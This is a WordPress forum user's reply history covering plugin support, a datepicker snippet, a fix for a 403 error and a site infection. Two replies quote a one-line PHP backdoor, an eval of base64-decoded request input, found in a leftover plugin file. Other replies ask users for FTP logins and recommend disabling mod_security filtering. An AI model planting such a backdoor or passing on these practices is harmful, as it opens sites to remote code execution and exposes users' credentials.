gal_op
Forum Replies Created
-
I am getting the same error, even if I start a new set of opening hour
Hi Stunley,
Thanks for you donation!
Sorry for the late reply, I don’t get notified when someone leave a message here.
If you can PM me one of the following I can help:
1. FTP logins – I will modify the plugin to not show the notification anymore
2. Your email address and I’ll send you a modified version of the pluginCheers,
Forum: Plugins
In reply to: [WP Responsive Auto Fit Text] Text spacing problem on initial loadHi simmsimaging,
Sorry for the late reply.
Are you able to PM me if you still experiencing the issue.
Thanks
Forum: Plugins
In reply to: [WP Responsive Auto Fit Text] WP Responsive Auto Fit TextHi Steve,
Sorry for the late reply.
You can simply use the shortcode to define the Font family:
[slabtext] [slab color="#000" font="Pacifico" transform="uppercase"]line 1[/slab] [slab color="#FFF" font="Arial"]line 3[/slab] [/slabtext]
Forum: Plugins
In reply to: [WP Responsive Auto Fit Text] Anyway to adjust font size?Hi blanktape,
Unfortunately there is no way to reduce the text size. The whole point of the plugin is to resize text automatically based on the width of the container.
Thanks
Forum: Plugins
In reply to: [WP Responsive Auto Fit Text] Optimize Press 2Hi Marcio,
Can you share a link to your website and I’ll have a look?
I have never used “Optimize Press” before.
Also include the shortcode markeup you are using.Thanks,
Forum: Plugins
In reply to: What happened to contact form db?I am really concern, I have hundreds of website using this plugin. I hope the developers will come up with a fix and re upload this popular plugin as soon as possible
Forum: Plugins
In reply to: [Import Export Suite for CSV and XML Datafeed] 403 ERRORThanks smackcoders
This fixed the issue:
This issue may caused because of the mod security module has been enabled in your environment. Kindly add these two details in htaccess file to fix the issue.
SecFilterEngine Off
SecFilterScanPOST OffForum: Plugins
In reply to: [Import Export Suite for CSV and XML Datafeed] 403 ERRORI get the same 403 error:
….wp-admin/admin.php?page=wp-ultimate-csv-importer/index.php&__module=custompost&step=importoptionsI am working on a temporary url : https://111.222.333.444/~sitename
I have enabled ini_set(‘display_errors’, ‘On’); but I dont see errors on the console.
Do you have any idea what can be the reason?
Forum: Plugins
In reply to: [Contact Form 7 Modules] Custom field – Send as HTMLHi r1se,
I haven’t figure it out yet. I was hoping someone here knows how to achieve this.
Thanks arekMP,
Your workaround is working really well.
I always prefer to use as less plug ins as possible in my sites.However your date picker is Russian.
English version below<?php wp_enqueue_script( 'jquery-ui-datepicker' ); ?> <?php wp_enqueue_style('jquery-style', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css'); ?> <script src="https://raw.github.com/jquery/jquery-ui/master/ui/i18n/jquery.ui.datepicker-en.js"></script> <script type="text/javascript"> jQuery(document).ready(function(){ jQuery('#your-textfield-id').datepicker({ dateFormat : 'D, d/m/yy' }); }); </script>
Forum: Plugins
In reply to: [Contact Form 7] [Plugin: Contact Form 7] Contact Form not sending mailAny one figured out how to solve this?
Forum: Plugins
In reply to: [Contact Form 7] [Plugin: Contact Form 7] Not working with WordPress 3.4?Did anyone solved this?
Forum: Fixing WordPress
In reply to: Javascript code apprearing on index.php – Malware Issue?I have the same issue, all my index.php are keep on being injected with the malicious code.
I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code:
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;I have removed the folder and now i am waiting to see if the malicious code is back.
I have found out that this is could be the backdoor:
https://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.htmlWill update you soon
Forum: Fixing WordPress
In reply to: malware attackI have the same issue, all my index.php are keep on being injected with the malicious code.
I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code:
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;I have removed the folder and now i am waiting to see if the malicious code is back.
I have found out that this is could be the backdoor:
https://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.htmlWill update you soon